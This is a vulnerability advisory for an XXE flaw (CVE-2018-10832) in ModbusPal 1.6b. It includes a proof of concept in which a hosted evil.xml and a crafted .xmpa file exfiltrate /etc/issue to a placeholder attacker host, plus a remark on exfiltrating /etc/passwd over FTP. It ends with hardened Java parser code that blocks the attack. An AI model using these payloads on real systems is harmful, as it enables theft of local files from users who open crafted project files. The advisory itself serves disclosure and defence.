[+] Exploit Title: ModbusPal XXE Injection
[+] Date: 05-08-2018
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: http://modbuspal.sourceforge.net/
[+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files
[+] Version: 1.6b
[+] Tested on: Ubuntu 16.04 with Java 1.8.0_151
[+] CVE: CVE-2018-10832

1. Vulnerability Description

ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files; both formats are XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user will, when the file is opened or imported in ModbusPal 1.6b, return the contents of local files to a remote attacker.

2. Proof of Concept

a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)

b.) Contents of hosted "evil.xml"

<!ENTITY % data SYSTEM "file:///etc/issue">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>">

c.) Example Exploited "xxe.xmpa"

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">
<modbuspal_automation>
<automation name="temp" step="1.0" loop="true" init="0.0">
</automation>
</modbuspal_automation>

3. Additional Details

Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '\n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single-line files that don't contain any restricted characters. The above PoC uses /etc/issue, which is one of the few common Linux files that meets this criterion. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of HTTP as the exfiltration channel for /etc/passwd.
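The fix on the application side is parser configuration. The loader below is an added example, not ModbusPal's own code: it keeps the legitimate modbuspal.dtd DOCTYPE parsable (banning DOCTYPE outright would break every real .xmpa/.xmpp file) but disables external general and parameter entities and external DTD loading, which is exactly what the PoC above relies on. The sample document is constructed; the class name is assumed.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public class SafeXmpaLoader {
    // Constructed sample shaped like a legitimate .xmpa file (not taken from the project).
    static final String SAMPLE =
          "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE modbuspal_automation SYSTEM \"modbuspal.dtd\">\n"
        + "<modbuspal_automation>\n"
        + "  <automation name=\"temp\" step=\"1.0\" loop=\"true\" init=\"0.0\"/>\n"
        + "</modbuspal_automation>\n";

    static DocumentBuilder hardenedBuilder() throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Real files carry <!DOCTYPE ... SYSTEM "modbuspal.dtd">, so the DOCTYPE itself stays
        // allowed; what is shut off is every path by which the parser fetches something external.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        DocumentBuilder db = dbf.newDocumentBuilder();
        // Defence in depth: should any resolution attempt slip through, it gets an empty document.
        db.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
        return db;
    }

    public static void main(String[] args) throws Exception {
        Document doc = hardenedBuilder().parse(new InputSource(new StringReader(SAMPLE)));
        System.out.println("root element: " + doc.getDocumentElement().getTagName());
    }
}
```

With these features set, a file whose internal subset declares a parameter entity pointing at an http:// or file:// URL is parsed without the parser ever contacting that URL, so nothing leaves the host.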